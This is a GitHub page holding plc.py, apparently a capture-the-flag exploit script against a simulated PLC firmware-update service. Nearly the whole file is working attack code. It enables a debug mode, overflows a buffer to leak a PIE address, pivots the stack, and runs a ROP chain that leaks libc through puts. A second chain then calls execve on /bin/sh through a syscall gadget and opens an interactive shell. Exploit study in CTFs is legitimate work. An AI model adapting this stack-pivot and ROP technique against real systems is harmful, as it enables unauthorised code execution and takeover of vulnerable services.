-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathplc.py
142 lines (107 loc) · 2.87 KB
/
plc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
import interact
from struct import *
pivot = 0xf12
main = 0x130b
plc_main = 0x11ac
pop_rdi = 0x00000000000013b3 # : pop rdi ; ret
puts = 0x8d0
exit = 0x950
system = 0x045390
binsh = 0x18cd57
xor_rax = 0x000000000008b8c5# : xor rax, rax ; ret
pop_rax = 0x33544 # : pop rax ; ret
syscall = 0xbc375 # : syscall ; ret
magic = 0x45216
pop_rdx_rsi = 0x1150c9 # : pop rdx ; pop rsi ; ret
def run_payload(ops):
p.sendline("U")
payload = "FWXX" + ops
payload = payload.ljust(0x400, "\x00")
payload = payload[0:0x400]
p.sendline(payload)
p.readuntil("ACTUAL FW CHECKSUM: ")
checksum = int(p.recv(4), 16)
print "checksum 0x{:x}".format(checksum)
p.sendline("U")
payload = "FW" + pack('H', checksum) + ops
payload = payload.ljust(0x400, "\x00")
payload = payload[0:0x400]
p.sendline(payload)
p.readuntil("SUCCESSFUL!")
p.sendline("E")
def set_debug():
print p.readuntil("Protocol")
p.sendline("U")
payload = "FW\x42\x5999819"
payload = payload.ljust(0x400, "\x00")
p.sendline(payload)
print p.readuntil("SUCCESSFUL!")
p.sendline("E")
print p.readuntil("RUNNING")
print "Done debug"
def exploit():
set_debug()
overwrite = ""
ops = "998130" + "2A"*68 + overwrite + "9"
run_payload(ops)
print p.readuntil("RUNNING")
p.sendline("S")
print p.readuntil("A"*68)
leak = p.readuntil("\n ")[:-3]
leak = leak.ljust(8, "\x00")[0:8]
print leak.encode("hex")
leak = unpack("Q", leak)[0]
base = leak - 0xab0
print "pie", hex(base)
pp = lambda x: pack("Q", base + x)
rip = pp(pivot)
mat = ""
for c in rip:
mat += "2" + c
ops = "998131" + "2A"*68 + mat + "7"*70 + "9"
run_payload(ops)
p.readuntil("OP 39\n")
rop = [
pp(pop_rdi),
pp(0x202018),
pp(puts),
pp(plc_main)
]
rop = "".join(rop)
payload = "A" * 912 + rop
payload = payload.ljust(0x400, "\x00")
p.send(payload)
libc_leak = unpack("Q", p.read(6).ljust(8, "\x00"))[0]
libc_base = libc_leak - 0x06f690
print "libc_base", hex(libc_base)
lp = lambda x: pack("Q", libc_base + x)
p64 = lambda x: pack("Q", x)
import time
time.sleep(2)
print "restarting"
p.sendline("S")
p.sendline("S")
p.readuntil("STATUS")
rip = pp(pivot)
mat = ""
for c in rip:
mat += "2" + c
ops = "998131" + "2A"*68 + mat + "7"*70 + "9"
run_payload(ops)
p.readuntil("OP 39\n")
rop = [
lp(pop_rax), p64(0x3B),
pp(pop_rdi), lp(binsh),
lp(pop_rdx_rsi), p64(0),p64(0),
lp(syscall),
pp(exit)
]
rop = "".join(rop)
payload = "A" * 912 + rop
payload = payload.ljust(0x400, "\x00")
p.send(payload)
p.interactive()
# flag{1s_thi5_th3_n3w_stuxn3t_0r_jus7_4_w4r_g4m3}
if __name__ == "__main__":
p = interact.Process()
exploit()